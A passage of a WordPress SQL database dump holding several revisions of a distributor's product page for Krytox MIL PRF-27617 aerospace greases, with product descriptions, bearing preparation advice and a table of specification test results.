areas.\r\n<h4><strong>Preparation Before Packing Bearings With Grease</strong></h4>\r\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox™ as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced\r\nlife in high temperature, high speed tests, where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting, so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden, and can create debris that will contaminate the grease.\r\n<h4><strong>Storage and Shelf Life</strong></h4>\r\nKrytox™ grease and oil lubricants have an indefinite shelf life, if unopened and stored in a clean dry location.\r\n\r\nCAGE No.: 43S57\r\n\r\nSIC Code: 2992 Lubricating Oils and Greases\r\n\r\nNAICS Code: 324191 Lubricating Oils and Greases Manufacturing\r\n\r\nDUNS: 557214574\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox</a> MIL PRF-27617 Greases</strong></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>240 AZ</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>240 AB</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>240 AC</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Qualification Reference Number, 1 Oct 2008</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-011</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-012</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-013</td>\r\n</tr>\r\n<tr>\r\n<td>Grease Type/Operating Range, °C (°F)</td>\r\n<td style="text-align: center;" width="206">Type I/–54 to 149\r\n(–65 to 300)</td>\r\n<td style="text-align: center;" width="206">Type II/–40 to 204\r\n(–40 to 399)</td>\r\n<td style="text-align: center;" width="206">Type III/–34 to 288\r\n(–29 to 550)</td>\r\n</tr>\r\n<tr>\r\n<td>NATO Number</td>\r\n<td style="text-align: center;">G-397</td>\r\n<td style="text-align: center;">G-398</td>\r\n<td style="text-align: center;">G-399</td>\r\n</tr>\r\n<tr>\r\n<td>Penetration Grade</td>\r\n<td style="text-align: center;">NLGI 1</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n</tr>\r\n<tr>\r\n<td>Change in Worked Penetration (30 max.)</td>\r\n<td style="text-align: center;">13</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">–3</td>\r\n</tr>\r\n<tr>\r\n<td>Corrosion on Copper (2b max.)</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n</tr>\r\n<tr>\r\n<td width="250">High Temperature Bearing Performance\r\n(500 hr min. at 10,000 RPM, 204 °C [399 °F])</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">Stopped at 1,320 hr</td>\r\n<td style="text-align: center;">Stopped at 1,685 hr</td>\r\n</tr>\r\n<tr>\r\n<td>Evaporation ASTM D-2595, %</td>\r\n<td style="text-align: center;">12.9</td>\r\n<td style="text-align: center;">10.1</td>\r\n<td style="text-align: center;">0.2</td>\r\n</tr>\r\n<tr>\r\n<td>Oil Separation, %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">14.2</td>\r\n<td style="text-align: center;">15.5</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility in Fuel (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.3</td>\r\n<td style="text-align: center;">0.1</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;" width="250">Liquid Oxygen Impact Sensitivity\r\n20 impacts at 43.3 in, no reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Water Washout Characteristics (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.25</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td>Oxidation Stability (5 max.), psi</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.5</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Dirt Count\r\n75 μ and larger (0 per cc max.)\r\n25 to 74 μ (1000 per cc max.)</td>\r\n<td style="text-align: center;">0/26</td>\r\n<td style="text-align: center;">0/0</td>\r\n<td style="text-align: center;">0/0</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Resistance to Aqueous Solution\r\nDistilled Water\r\n50/50 Distilled Water/Ethanol</td>\r\n<td width="206">\r\n<p style="text-align: center;">Pass\r\nPass</p>\r\n</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n</tr>\r\n<tr>\r\n<td>Film Stability and Corrosion on Steel</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Base Oil Viscosity, 40 °C (104 °F), cSt</td>\r\n<td style="text-align: center;">22.8</td>\r\n<td style="text-align: center;">77.8</td>\r\n<td style="text-align: center;">243</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Useful Range, °C</td>\r\n<td style="text-align: center;">–57 to 149</td>\r\n<td style="text-align: center;">–40 to 232</td>\r\n<td style="text-align: center;">–34 to 288</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'MIL PRF-27617 Greases—Grease, Aircraft and Instrument, Fuel- and Oxidizer-Resistant', '', 'inherit', 'closed', 'closed', '', '2552-revision-v1', '', '', '2016-10-12 15:28:36', '2016-10-12 15:28:36', '', 2552, 'https://www.miller-stephenson.com/2552-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2559, 2, '2016-10-12 15:30:17', '2016-10-12 15:30:17', '<h1><strong>MIL PRF-27617 Greases</strong></h1>\n<h4><strong>Product Information</strong></h4>\nKrytox™ oils and MIL PRF-27617 greases are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox™ oils and greases are silicone free and do not damage plastics or elastomers, or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial, and semiconductor applications, as well as solving many other routine lubrication problems.\n\nKrytox™ greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written.\n\nThis is the latest data from the recertification that is required every five years. Krytox™ greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\n<h4><strong>Typical Applications</strong></h4>\nApplications for Krytox™ lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity, or down time, Krytox™ is the lubricant of choice in a wide range of industries and applications.\n\nIn the aerospace industry, Krytox™ oils and greases are applied on various settings, spanning from bearings and sealants to O-rings and oxygen systems. Krytox™ is a valuable asset to the aerospace industry, due to its superior performance in a wide range of temperatures scaling from 70 to 399 ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox™ lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the\naerospace industry, it can be expected that Krytox™ delivers a high level of product excellence.\n\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">Krytox™  240 AC, 240 AB, and 240 AZ</a> gr-1 are MIL PRF-27617 greases and now have <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF approval for incidental food contact (H-1)</a> in and around food processing areas.\n<h4><strong>Preparation Before Packing Bearings With Grease</strong></h4>\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox™ as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced\nlife in high temperature, high speed tests, where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting, so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden, and can create debris that will contaminate the grease.\n<h4><strong>Storage and Shelf Life</strong></h4>\nKrytox™ grease and oil lubricants have an indefinite shelf life, if unopened and stored in a clean dry location.\n\nCAGE No.: 43S57\n\nSIC Code: 2992 Lubricating Oils and Greases\n\nNAICS Code: 324191 Lubricating Oils and Greases Manufacturing\n\nDUNS: 557214574\n<table width="868">\n<tbody>\n<tr>\n<td width="250"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox</a> MIL PRF-27617 Greases</strong></td>\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>240 AZ</strong></a></td>\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>240 AB</strong></a></td>\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>240 AC</strong></a></td>\n</tr>\n<tr>\n<td>Qualification Reference Number, 1 Oct 2008</td>\n<td style="text-align: center;">AFPET/PTPT 08-011</td>\n<td style="text-align: center;">AFPET/PTPT 08-012</td>\n<td style="text-align: center;">AFPET/PTPT 08-013</td>\n</tr>\n<tr>\n<td>Grease Type/Operating Range, °C (°F)</td>\n<td style="text-align: center;" width="206">Type I/–54 to 149\n(–65 to 300)</td>\n<td style="text-align: center;" width="206">Type II/–40 to 204\n(–40 to 399)</td>\n<td style="text-align: center;" width="206">Type III/–34 to 288\n(–29 to 550)</td>\n</tr>\n<tr>\n<td>NATO Number</td>\n<td style="text-align: center;">G-397</td>\n<td style="text-align: center;">G-398</td>\n<td style="text-align: center;">G-399</td>\n</tr>\n<tr>\n<td>Penetration Grade</td>\n<td style="text-align: center;">NLGI 1</td>\n<td style="text-align: center;">NLGI 2</td>\n<td style="text-align: center;">NLGI 2</td>\n</tr>\n<tr>\n<td>Change in Worked Penetration (30 max.)</td>\n<td style="text-align: center;">13</td>\n<td style="text-align: center;">3</td>\n<td style="text-align: center;">–3</td>\n</tr>\n<tr>\n<td>Corrosion on Copper (2b max.)</td>\n<td style="text-align: center;">1b</td>\n<td style="text-align: center;">1b</td>\n<td style="text-align: center;">1b</td>\n</tr>\n<tr>\n<td width="250">High Temperature Bearing Performance\n(500 hr min. at 10,000 RPM, 204 °C [399 °F])</td>\n<td style="text-align: center;">—</td>\n<td style="text-align: center;">Stopped at 1,320 hr</td>\n<td style="text-align: center;">Stopped at 1,685 hr</td>\n</tr>\n<tr>\n<td>Evaporation ASTM D-2595, %</td>\n<td style="text-align: center;">12.9</td>\n<td style="text-align: center;">10.1</td>\n<td style="text-align: center;">0.2</td>\n</tr>\n<tr>\n<td>Oil Separation, %</td>\n<td style="text-align: center;">—</td>\n<td style="text-align: center;">14.2</td>\n<td style="text-align: center;">15.5</td>\n</tr>\n<tr>\n<td>Solubility in Fuel (20% max.), %</td>\n<td style="text-align: center;">—</td>\n<td style="text-align: center;">0.3</td>\n<td style="text-align: center;">0.1</td>\n</tr>\n<tr>\n<td style="text-align: left;" width="250">Liquid Oxygen Impact Sensitivity\n20 impacts at 43.3 in, no reaction</td>\n<td style="text-align: center;">No Reaction</td>\n<td style="text-align: center;">No Reaction</td>\n<td style="text-align: center;">No Reaction</td>\n</tr>\n<tr>\n<td style="text-align: left;">Water Washout Characteristics (20% max.), %</td>\n<td style="text-align: center;">—</td>\n<td style="text-align: center;">0.25</td>\n<td style="text-align: center;">—</td>\n</tr>\n<tr>\n<td>Oxidation Stability (5 max.), psi</td>\n<td style="text-align: center;">—</td>\n<td style="text-align: center;">0.5</td>\n<td style="text-align: center;">—</td>\n</tr>\n<tr>\n<td width="250">Dirt Count\n75 μ and larger (0 per cc max.)\n25 to 74 μ (1000 per cc max.)</td>\n<td style="text-align: center;">0/26</td>\n<td style="text-align: center;">0/0</td>\n<td style="text-align: center;">0/0</td>\n</tr>\n<tr>\n<td width="250">Resistance to Aqueous Solution\nDistilled Water\n50/50 Distilled Water/Ethanol</td>\n<td width="206">\n<p style="text-align: center;">Pass\nPass</p>\n</td>\n<td style="text-align: center;" width="206">Pass\nPass</td>\n<td style="text-align: center;" width="206">Pass\nPass</td>\n</tr>\n<tr>\n<td>Film Stability and Corrosion on Steel</td>\n<td style="text-align: center;">Pass</td>\n<td style="text-align: center;">Pass</td>\n<td style="text-align: center;">Pass</td>\n</tr>\n<tr>\n<td>Krytox™ Base Oil Viscosity, 40 °C (104 °F), cSt</td>\n<td style="text-align: center;">22.8</td>\n<td style="text-align: center;">77.8</td>\n<td style="text-align: center;">243</td>\n</tr>\n<tr>\n<td>Krytox™ Useful Range, °C</td>\n<td style="text-align: center;">–57 to 149</td>\n<td style="text-align: center;">–40 to 232</td>\n<td style="text-align: center;">–34 to 288</td>\n</tr>\n</tbody>\n</table>\nIf these greases are not right for you, please click here', 'MIL PRF-27617 Greases—Grease, Aircraft and Instrument, Fuel- and Oxidizer-Resistant', '', 'inherit', 'closed', 'closed', '', '2552-autosave-v1', '', '', '2016-10-12 15:30:17', '2016-10-12 15:30:17', '', 2552, 'https://www.miller-stephenson.com/2552-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2560, 2, '2016-10-12 15:30:37', '2016-10-12 15:30:37', '<h1><strong>MIL PRF-27617 Greases</strong></h1>\r\n<h4><strong>Product Information</strong></h4>\r\nKrytox™ oils and MIL PRF-27617 greases are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox™ oils and greases are silicone free and do not damage plastics or elastomers, or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial, and semiconductor applications, as well as solving many other routine lubrication problems.\r\n\r\nKrytox™ greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written.\r\n\r\nThis is the latest data from the recertification that is required every five years. Krytox™ greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n<h4><strong>Typical Applications</strong></h4>\r\nApplications for Krytox™ lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity, or down time, Krytox™ is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox™ oils and greases are applied on various settings, spanning from bearings and sealants to O-rings and oxygen systems. Krytox™ is a valuable asset to the aerospace industry, due to its superior performance in a wide range of temperatures scaling from 70 to 399 ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox™ lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the\r\naerospace industry, it can be expected that Krytox™ delivers a high level of product excellence.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">Krytox™  240 AC, 240 AB, and 240 AZ</a> gr-1 are MIL PRF-27617 greases and now have <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF approval for incidental food contact (H-1)</a> in and around food processing areas.\r\n<h4><strong>Preparation Before Packing Bearings With Grease</strong></h4>\r\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox™ as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced\r\nlife in high temperature, high speed tests, where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting, so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden, and can create debris that will contaminate the grease.\r\n<h4><strong>Storage and Shelf Life</strong></h4>\r\nKrytox™ grease and oil lubricants have an indefinite shelf life, if unopened and stored in a clean dry location.\r\n\r\nCAGE No.: 43S57\r\n\r\nSIC Code: 2992 Lubricating Oils and Greases\r\n\r\nNAICS Code: 324191 Lubricating Oils and Greases Manufacturing\r\n\r\nDUNS: 557214574\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox</a> MIL PRF-27617 Greases</strong></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>240 AZ</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>240 AB</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>240 AC</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Qualification Reference Number, 1 Oct 2008</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-011</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-012</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-013</td>\r\n</tr>\r\n<tr>\r\n<td>Grease Type/Operating Range, °C (°F)</td>\r\n<td style="text-align: center;" width="206">Type I/–54 to 149\r\n(–65 to 300)</td>\r\n<td style="text-align: center;" width="206">Type II/–40 to 204\r\n(–40 to 399)</td>\r\n<td style="text-align: center;" width="206">Type III/–34 to 288\r\n(–29 to 550)</td>\r\n</tr>\r\n<tr>\r\n<td>NATO Number</td>\r\n<td style="text-align: center;">G-397</td>\r\n<td style="text-align: center;">G-398</td>\r\n<td style="text-align: center;">G-399</td>\r\n</tr>\r\n<tr>\r\n<td>Penetration Grade</td>\r\n<td style="text-align: center;">NLGI 1</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n</tr>\r\n<tr>\r\n<td>Change in Worked Penetration (30 max.)</td>\r\n<td style="text-align: center;">13</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">–3</td>\r\n</tr>\r\n<tr>\r\n<td>Corrosion on Copper (2b max.)</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n</tr>\r\n<tr>\r\n<td width="250">High Temperature Bearing Performance\r\n(500 hr min. at 10,000 RPM, 204 °C [399 °F])</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">Stopped at 1,320 hr</td>\r\n<td style="text-align: center;">Stopped at 1,685 hr</td>\r\n</tr>\r\n<tr>\r\n<td>Evaporation ASTM D-2595, %</td>\r\n<td style="text-align: center;">12.9</td>\r\n<td style="text-align: center;">10.1</td>\r\n<td style="text-align: center;">0.2</td>\r\n</tr>\r\n<tr>\r\n<td>Oil Separation, %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">14.2</td>\r\n<td style="text-align: center;">15.5</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility in Fuel (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.3</td>\r\n<td style="text-align: center;">0.1</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;" width="250">Liquid Oxygen Impact Sensitivity\r\n20 impacts at 43.3 in, no reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Water Washout Characteristics (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.25</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td>Oxidation Stability (5 max.), psi</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.5</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Dirt Count\r\n75 μ and larger (0 per cc max.)\r\n25 to 74 μ (1000 per cc max.)</td>\r\n<td style="text-align: center;">0/26</td>\r\n<td style="text-align: center;">0/0</td>\r\n<td style="text-align: center;">0/0</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Resistance to Aqueous Solution\r\nDistilled Water\r\n50/50 Distilled Water/Ethanol</td>\r\n<td width="206">\r\n<p style="text-align: center;">Pass\r\nPass</p>\r\n</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n</tr>\r\n<tr>\r\n<td>Film Stability and Corrosion on Steel</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Base Oil Viscosity, 40 °C (104 °F), cSt</td>\r\n<td style="text-align: center;">22.8</td>\r\n<td style="text-align: center;">77.8</td>\r\n<td style="text-align: center;">243</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Useful Range, °C</td>\r\n<td style="text-align: center;">–57 to 149</td>\r\n<td style="text-align: center;">–40 to 232</td>\r\n<td style="text-align: center;">–34 to 288</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/krytox/">If these greases are not right for you, please click here to learn more about Krytox greases and oils.</a>', 'MIL PRF-27617 Greases—Grease, Aircraft and Instrument, Fuel- and Oxidizer-Resistant', '', 'inherit', 'closed', 'closed', '', '2552-revision-v1', '', '', '2016-10-12 15:30:37', '2016-10-12 15:30:37', '', 2552, 'https://www.miller-stephenson.com/2552-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2561, 2, '2016-10-12 15:31:06', '2016-10-12 15:31:06', '<h1><strong>MIL PRF-27617 Greases</strong></h1>\r\n<h4><strong>Product Information</strong></h4>\r\nKrytox™ oils and MIL PRF-27617 greases are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox™ oils and greases are silicone free and do not damage plastics or elastomers, or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial, and semiconductor applications, as well as solving many other routine lubrication problems.\r\n\r\nKrytox™ greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written.\r\n\r\nThis is the latest data from the recertification that is required every five years. Krytox™ greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n<h4><strong>Typical Applications</strong></h4>\r\nApplications for Krytox™ lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity, or down time, Krytox™ is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox™ oils and greases are applied on various settings, spanning from bearings and sealants to O-rings and oxygen systems. Krytox™ is a valuable asset to the aerospace industry, due to its superior performance in a wide range of temperatures scaling from 70 to 399 ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox™ lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the\r\naerospace industry, it can be expected that Krytox™ delivers a high level of product excellence.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">Krytox™  240 AC, 240 AB, and 240 AZ</a> gr-1 are MIL PRF-27617 greases and now have <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF approval for incidental food contact (H-1)</a> in and around food processing areas.\r\n<h4><strong>Preparation Before Packing Bearings With Grease</strong></h4>\r\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox™ as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced life in high temperature, high speed tests, where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting, so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden, and can create debris that will contaminate the grease.\r\n<h4><strong>Storage and Shelf Life</strong></h4>\r\nKrytox™ grease and oil lubricants have an indefinite shelf life, if unopened and stored in a clean dry location.\r\n\r\nCAGE No.: 43S57\r\n\r\nSIC Code: 2992 Lubricating Oils and Greases\r\n\r\nNAICS Code: 324191 Lubricating Oils and Greases Manufacturing\r\n\r\nDUNS: 557214574\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox</a> MIL PRF-27617 Greases</strong></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>240 AZ</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>240 AB</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>240 AC</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Qualification Reference Number, 1 Oct 2008</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-011</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-012</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-013</td>\r\n</tr>\r\n<tr>\r\n<td>Grease Type/Operating Range, °C (°F)</td>\r\n<td style="text-align: center;" width="206">Type I/–54 to 149\r\n(–65 to 300)</td>\r\n<td style="text-align: center;" width="206">Type II/–40 to 204\r\n(–40 to 399)</td>\r\n<td style="text-align: center;" width="206">Type III/–34 to 288\r\n(–29 to 550)</td>\r\n</tr>\r\n<tr>\r\n<td>NATO Number</td>\r\n<td style="text-align: center;">G-397</td>\r\n<td style="text-align: center;">G-398</td>\r\n<td style="text-align: center;">G-399</td>\r\n</tr>\r\n<tr>\r\n<td>Penetration Grade</td>\r\n<td style="text-align: center;">NLGI 1</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n</tr>\r\n<tr>\r\n<td>Change in Worked Penetration (30 max.)</td>\r\n<td style="text-align: center;">13</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">–3</td>\r\n</tr>\r\n<tr>\r\n<td>Corrosion on Copper (2b max.)</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n</tr>\r\n<tr>\r\n<td width="250">High Temperature Bearing Performance\r\n(500 hr min. at 10,000 RPM, 204 °C [399 °F])</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">Stopped at 1,320 hr</td>\r\n<td style="text-align: center;">Stopped at 1,685 hr</td>\r\n</tr>\r\n<tr>\r\n<td>Evaporation ASTM D-2595, %</td>\r\n<td style="text-align: center;">12.9</td>\r\n<td style="text-align: center;">10.1</td>\r\n<td style="text-align: center;">0.2</td>\r\n</tr>\r\n<tr>\r\n<td>Oil Separation, %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">14.2</td>\r\n<td style="text-align: center;">15.5</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility in Fuel (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.3</td>\r\n<td style="text-align: center;">0.1</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;" width="250">Liquid Oxygen Impact Sensitivity\r\n20 impacts at 43.3 in, no reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Water Washout Characteristics (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.25</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td>Oxidation Stability (5 max.), psi</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.5</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Dirt Count\r\n75 μ and larger (0 per cc max.)\r\n25 to 74 μ (1000 per cc max.)</td>\r\n<td style="text-align: center;">0/26</td>\r\n<td style="text-align: center;">0/0</td>\r\n<td style="text-align: center;">0/0</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Resistance to Aqueous Solution\r\nDistilled Water\r\n50/50 Distilled 